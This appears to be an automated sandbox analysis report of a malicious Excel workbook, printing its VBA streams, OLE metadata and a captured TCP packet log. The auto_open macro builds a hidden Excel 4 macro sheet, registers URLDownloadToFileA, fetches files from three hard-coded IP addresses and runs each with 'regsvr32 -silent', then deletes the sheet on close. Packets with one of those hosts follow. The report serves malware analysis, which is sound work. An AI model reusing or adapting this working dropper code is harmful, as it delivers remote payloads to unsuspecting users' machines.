      Attribute VB_PredeclaredId = True
      Attribute VB_Exposed = False
      Attribute VB_TemplateDerived = False
      Attribute VB_Customizable = False
      VBA File Name: Module1, Stream Size: 4112
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/Module1
      VBA File Name:Module1
      Stream Size:4112
      VBA Code
      Attribute VB_Name = "Module1"
      
      Sub auto_open()
      On Error Resume Next
      Drezden = "="
      Naret = "EXEC"
      Application.ScreenUpdating = False
      Gert
      Sheets("Sheet5").Visible = False
      Sheets("Sheet5").Range("A1:M100").Font.Color = vbWhite
      
      Sheets("Sheet5").Range("H24") = UserForm1.Label1.Caption
      Sheets("Sheet5").Range("H25") = UserForm1.Label3.Caption
      Sheets("Sheet5").Range("H26") = UserForm1.Label4.Caption
      
      Sheets("Sheet5").Range("K17") = "=NOW()"
      Sheets("Sheet5").Range("K18") = ".dat"
      Sheets("Sheet5").Range("K18") = ".dat"
      
      
      Sheets("Sheet5").Range("H35") = "=HALT()"
      Sheets("Sheet5").Range("I9") = UserForm1.Label2.Caption
      Sheets("Sheet5").Range("I10") = UserForm1.Caption
      Sheets("Sheet5").Range("I11") = "J" & "J" & "C" & "C" & "B" & "B"
      Sheets("Sheet5").Range("I12") = "Byukilos"
      Sheets("Sheet5").Range("G10") = "..\Fiosa.der"
      Sheets("Sheet5").Range("G11") = "..\Fiosa1.der"
      Sheets("Sheet5").Range("G12") = "..\Fiosa2.der"
      Sheets("Sheet5").Range("I17") = "regsvr32 -silent ..\Fiosa.der"
      Sheets("Sheet5").Range("I18") = "regsvr32 -silent ..\Fiosa1.der"
      Sheets("Sheet5").Range("I19") = "regsvr32 -silent ..\Fiosa2.der"
      Sheets("Sheet5").Range("H10") = "=Byukilos(0,H24&K17&K18,G10,0,0)"
      Sheets("Sheet5").Range("H11") = "=Byukilos(0,H25&K17&K18,G11,0,0)"
      Sheets("Sheet5").Range("H12") = "=Byukilos(0,H26&K17&K18,G12,0,0)"
      Sheets("Sheet5").Range("H9") = Drezden & "REGISTER(I9,I10&J10,I11,I12,,1,9)"
      Sheets("Sheet5").Range("H17") = Drezden & Naret & "(I17)"
      Sheets("Sheet5").Range("H18") = Drezden & Naret & "(I18)"
      Sheets("Sheet5").Range("H19") = Drezden & Naret & "(I19)"
      
      
      Application.Run Sheets("Sheet5").Range("H1")
      
      End Sub
      
      Sub auto_close()
      On Error Resume Next
      Application.ScreenUpdating = True
         Application.DisplayAlerts = False
         Sheets("Sheet5").Delete
         Application.DisplayAlerts = True
      End Sub
      
      Function Gert()
      Set Fera = Excel4IntlMacroSheets
      Fera.Add.Name = "Sheet5"
      End Function
      VBA File Name: Sheet1, Stream Size: 991
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
      VBA File Name:Sheet1
      Stream Size:991
      VBA Code
      Attribute VB_Name = "Sheet1"
      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
      Attribute VB_GlobalNameSpace = False
      Attribute VB_Creatable = False
      Attribute VB_PredeclaredId = True
      Attribute VB_Exposed = True
      Attribute VB_TemplateDerived = False
      Attribute VB_Customizable = True
      VBA File Name: ThisWorkbook, Stream Size: 2774
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
      VBA File Name:ThisWorkbook
      Stream Size:2774
      VBA Code
      Attribute VB_Name = "ThisWorkbook"
      Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
      Attribute VB_GlobalNameSpace = False
      Attribute VB_Creatable = False
      Attribute VB_PredeclaredId = True
      Attribute VB_Exposed = True
      Attribute VB_TemplateDerived = False
      Attribute VB_Customizable = True
      Option Explicit
      
      Private m_openAlreadyRan As Boolean
      Private m_isOpenDelayed As Boolean
      
      Friend Sub FireOpenEventIfNeeded(Optional dummyVarToMakeProcHidden As Boolean)
      End Sub
      
      Private Sub asWorkbook_Activateas()
          On Error Resume Next
      
          If m_isOpenDelayed Then
              m_isOpenDelayed = False
              InitWorkbook
          End If
      End Sub
      
      Private Sub saWorkbook_Opensa()
          On Error Resume Next
      
          m_openAlreadyRan = True
          Dim objProtectedViewWindow As ProtectedViewWindow
          '
          On Error GoTo 0
          '
          m_isOpenDelayed = Not (objProtectedViewWindow Is Nothing)
          If Not m_isOpenDelayed Then InitWorkbook
      End Sub
      
      Private Sub ssaaInitWorkbookssaa()
          On Error Resume Next
      
          If VBA.Val(Application.Version) < 12 Then
              Me.Close False
              Exit Sub
          End If
          '
              'Other code
              '
              '
              '
      End Sub
      VBA File Name: UserForm1, Stream Size: 1180
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/UserForm1
      VBA File Name:UserForm1
      Stream Size:1180
      VBA Code
      Attribute VB_Name = "UserForm1"
      Attribute VB_Base = "0{6E2E223A-A629-4255-BA17-B75486DE444A}{A668B021-7649-4DE4-8D02-89E3EA2CFA2A}"
      Attribute VB_GlobalNameSpace = False
      Attribute VB_Creatable = False
      Attribute VB_PredeclaredId = True
      Attribute VB_Exposed = False
      Attribute VB_TemplateDerived = False
      Attribute VB_Customizable = False

      Streams

      Stream Path: \x1CompObj, File Type: data, Stream Size: 108
      General
      Stream Path:\x1CompObj
      File Type:data
      Stream Size:108
      Entropy:4.18849998853
      Base64 Encoded:True
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . M i c r o s o f t E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
      Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
      General
      Stream Path:\x5DocumentSummaryInformation
      File Type:data
      Stream Size:244
      Entropy:2.65175227267
      Base64 Encoded:False
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
      Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 208
      General
      Stream Path:\x5SummaryInformation
      File Type:data
      Stream Size:208
      Entropy:3.30164724619
      Base64 Encoded:False
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T e s t . . . . . . . . . . . . T e s t . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . x s . . . . . @ . . . . 3 . B # . . . . . . . . . . .
      Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 391141
      General
      Stream Path:Workbook
      File Type:Applesoft BASIC program data, first line number 16
      Stream Size:391141
      Entropy:7.94597570807
      Base64 Encoded:True
      Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . T e s t B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . d . % 8 . . . . . . . X . @
      Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 661
      General
      Stream Path:_VBA_PROJECT_CUR/PROJECT
      File Type:ASCII text, with CRLF line terminators
      Stream Size:661
      Entropy:5.27224586563
      Base64 Encoded:True
      Data ASCII:I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l e 1 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . B a s e C l a s s = U s e r F o r m 1 . . H e l p F i l e = " " . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t
      Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 116
      General
      Stream Path:_VBA_PROJECT_CUR/PROJECTwm
      File Type:data
      Stream Size:116
      Entropy:3.35524796933
      Base64 Encoded:False
      Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . U s e r F o r m 1 . U . s . e . r . F . o . r . m . 1 . . . . .
      Stream Path: _VBA_PROJECT_CUR/UserForm1/\x1CompObj, File Type: data, Stream Size: 97
      General
      Stream Path:_VBA_PROJECT_CUR/UserForm1/\x1CompObj
      File Type:data
      Stream Size:97
      Entropy:3.61064918306
      Base64 Encoded:False
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
      Stream Path: _VBA_PROJECT_CUR/UserForm1/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 301
      General
      Stream Path:_VBA_PROJECT_CUR/UserForm1/\x3VBFrame
      File Type:ASCII text, with CRLF line terminators
      Stream Size:301
      Entropy:4.64742015018
      Base64 Encoded:True
      Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 1 . . C a p t i o n = " U R L D o w n l o a d T o F i l e A " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1
      Stream Path: _VBA_PROJECT_CUR/UserForm1/f, File Type: data, Stream Size: 263
      General
      Stream Path:_VBA_PROJECT_CUR/UserForm1/f
      File Type:data
      Stream Size:263
      Entropy:3.59027175124
      Base64 Encoded:False
      Data ASCII:. . $ . . . . . . . . . . . . . . . . . . } . . k . . . . . . . . . . . . . . . . R . . . . . . . . . . . K . Q . . . . . . D B . . . T a h o m a . . . . . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 1 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . 8 . . . . . . . L a b e l 2 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 3 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 4 . . O
      Stream Path: _VBA_PROJECT_CUR/UserForm1/o, File Type: data, Stream Size: 272
      General
      Stream Path:_VBA_PROJECT_CUR/UserForm1/o
      File Type:data
      Stream Size:272
      Entropy:3.7315998228
      Base64 Encoded:True
      Data ASCII:. . ( . ( . . . . . . . h t t p : / / 1 9 0 . 1 4 . 3 7 . 1 7 3 / . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . . . ( . . . . . . . u R l M o n . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . ( . ( . . . . . . . h t t p : / / 1 1 1 . 9 0 . 1 4 8 . 1 0 4 / . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . ( . ( . . . . . . . h t t p : / / 5 1 . 8 9 . 1 1 5 . 1 1 1 / . . . . . . . . . . . . . . . 5 . . . . . . .
      Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 3819
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
      File Type:data
      Stream Size:3819
      Entropy:4.49037503963
      Base64 Encoded:False
      Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
      Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 2035
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_0
      File Type:data
      Stream Size:2035
      Entropy:3.42846113886
      Base64 Encoded:False
      Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 138
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_1
      File Type:data
      Stream Size:138
      Entropy:1.48462480805
      Base64 Encoded:False
      Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 264
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_2
      File Type:data
      Stream Size:264
      Entropy:1.9985725068
      Base64 Encoded:False
      Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 256
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_3
      File Type:data
      Stream Size:256
      Entropy:1.80540314317
      Base64 Encoded:False
      Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: SVR2 executable (USS/370) not stripped - version 12587540, Stream Size: 865
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/dir
      File Type:SVR2 executable (USS/370) not stripped - version 12587540
      Stream Size:865
      Entropy:6.55213343791
      Base64 Encoded:True
      Data ASCII:. ] . . . . . . . . . . 0 . J . . . . H . . H . . . . . . H . . . d . . . . . . . . V B A P r @ o j e c t . . . . T . @ . . . . . = . . . + . r . . . . . . . . . v . A c . . . . J < . . . . . . 9 s t d o l . e > . . s . t . d . . o . l . e . . . . h . % ^ . . * \\ G . { 0 0 0 2 0 4 3 . 0 - . . . . C . . . . . . . 0 0 4 6 } # 2 . . 0 # 0 # C : \\ W . i n d o w s \\ S . y s t e m 3 2 \\ . . e 2 . t l b # O . L E A u t o m . a t i o n . 0 . . . E O f f i c . E O . . f . . i . c . E . . . . . . . . E 2 D F 8 D

      Network Behavior

      Network Port Distribution

      TCP Packets

      Sep 24, 2021 15:59:29.285180092 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.285196066 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.285202026 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.285226107 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.285243034 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.285244942 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.285257101 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.285263062 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.285284042 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.285307884 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.285315037 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.285331011 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.285346031 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.285368919 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.285392046 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.286144018 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.287856102 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.287879944 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.287895918 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.287969112 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.287986994 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.295012951 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.500189066 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500226974 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500243902 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500264883 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500284910 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500307083 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500328064 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500354052 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500375986 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500392914 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.500396013 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500417948 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.500418901 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500441074 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500452042 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.500463009 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500480890 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.500485897 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500508070 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500515938 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.500533104 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500552893 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.500556946 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500579119 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500587940 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.500602007 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500617027 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.500626087 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500648975 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500648975 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.500670910 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500674009 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.500694036 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500703096 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.500719070 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500734091 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.500741959 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500762939 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.500762939 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500785112 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500793934 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.500807047 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500823021 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.500838041 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500858068 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500870943 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.500880003 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500895977 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.500905991 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500925064 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.500930071 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500950098 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500953913 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.500971079 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500986099 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.500999928 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.501019001 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.501025915 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.501039028 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.501044035 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.501063108 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.501066923 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.501087904 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.501097918 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.501111031 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.501312971 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.503722906 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.688043118 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.688080072 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.688092947 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.688108921 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.688122034 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.688138008 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.688318968 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.716057062 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.716084957 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.716104984 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.716123104 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.716140985 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.716160059 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.716178894 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.716202021 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.716279984 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.716303110 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.716378927 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.716466904 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.719002962 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.719029903 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.719060898 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.719085932 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.719094992 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.719109058 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.719158888 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.719160080 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.719189882 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.719218969 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.719227076 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.719237089 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.719244957 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.719263077 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.719273090 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.719330072 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.721795082 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.894299984 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.894365072 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.894403934 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.894440889 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.894488096 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.894534111 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.894551039 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.894572973 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.894577026 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.894579887 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.894628048 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.894634962 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.894669056 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.894680023 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.894706964 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.894723892 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.894746065 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.894757032 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.894784927 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.894797087 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.894823074 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.894835949 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.894862890 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.894874096 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.894900084 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.894922018 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.894943953 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.894948006 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.894992113 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.895003080 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.895030022 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.895040989 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.895070076 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.895080090 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.895107985 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.895142078 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.895200014 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.895215988 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.895262957 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.895265102 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.895313978 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.898407936 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.898459911 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.898495913 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.898525000 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.898534060 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.898556948 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.898571014 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.898586035 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.898622990 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.898627043 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.898669004 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.898672104 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.898705959 CEST8049167190.14.37.173192.168.2.22
